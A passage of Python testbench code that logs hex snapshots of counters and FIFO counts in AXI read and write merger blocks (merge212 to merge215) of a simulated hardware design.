logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge212.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge212.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge212.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge212.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge212.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge212.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge212.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge213.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge213.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge213.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge213.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge213.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge213.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge213.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge213.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge213.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge213.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge213.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge213.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge213.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge213.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge213.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge213.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge213.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge213.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge213.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge213.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge213.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge213.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge213.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge213.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge213.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge213.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge213.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge213.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge213.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge213.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge213.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge213.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge213.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge213.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge213.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge213.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge213.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge213.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge213.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge213.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge213.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge213.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge213.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge213.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge213.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge213.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge213.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge213.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge213.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge213.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge213.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge213.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge213.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge213.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge213.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge213.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge213.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge213.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge213.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge213.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge213.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge213.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge213.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge213.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge213.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge213.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge213.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge213.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge213.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge213.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge213.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge213.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge213.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge213.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge213.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge213.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge213.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge213.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge213.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge213.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge213.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge213.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge213.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge213.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge213.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge213.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge213.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge213.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge213.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge213.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge213.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge213.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge213.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge213.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge213.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge213.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge213.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge213.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge213.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge213.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge213.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge213.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge213.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge213.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge213.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge213.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge213.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge213.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge214.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge214.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge214.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge214.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge214.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge214.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge214.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge214.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge214.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge214.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge214.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge214.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge214.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge214.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge214.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge214.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge214.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge214.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge214.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge214.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge214.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge214.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge214.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge214.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge214.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge214.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge214.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge214.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge214.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge214.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge214.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge214.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge214.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge214.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge214.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge214.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge214.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge214.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge214.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge214.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge214.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge214.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge214.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge214.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge214.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge214.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge214.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge214.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge214.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge214.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge214.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge214.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge214.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge214.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge214.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge214.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge214.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge214.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge214.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge214.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge214.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge214.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge214.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge214.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge214.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge214.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge214.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge214.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge214.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge214.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge214.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge214.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge214.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge214.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge214.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge214.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge214.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge214.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge214.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge214.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge214.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge214.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge214.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge214.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge214.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge214.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge214.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge214.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge214.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge214.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge214.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge214.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge214.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge214.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge214.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge214.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge214.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge214.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge214.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge214.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge214.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge214.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge214.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge214.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge214.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge214.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge214.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge214.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge215.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge215.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge215.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge215.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge215.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge215.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge215.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge215.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge215.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge215.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge215.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge215.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge215.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge215.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge215.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge215.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge215.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge215.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge215.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge215.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge215.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge215.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge215.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge215.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge215.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge215.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge215.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge215.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge215.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge215.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge215.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge215.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge215.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge215.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge215.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge215.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge215.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge215.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge215.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge215.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge215.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge215.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge215.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge215.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge215.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge215.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge215.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge215.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge215.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge215.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge215.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge215.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge215.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge215.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge215.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge215.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge215.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge215.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge215.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge215.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge215.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge215.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge215.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge215.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge215.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge215.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge215.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge215.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge215.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge215.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge215.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge215.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge215.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge215.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge215.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge215.axi_wr_4_merger.b_b_fifo.count"))
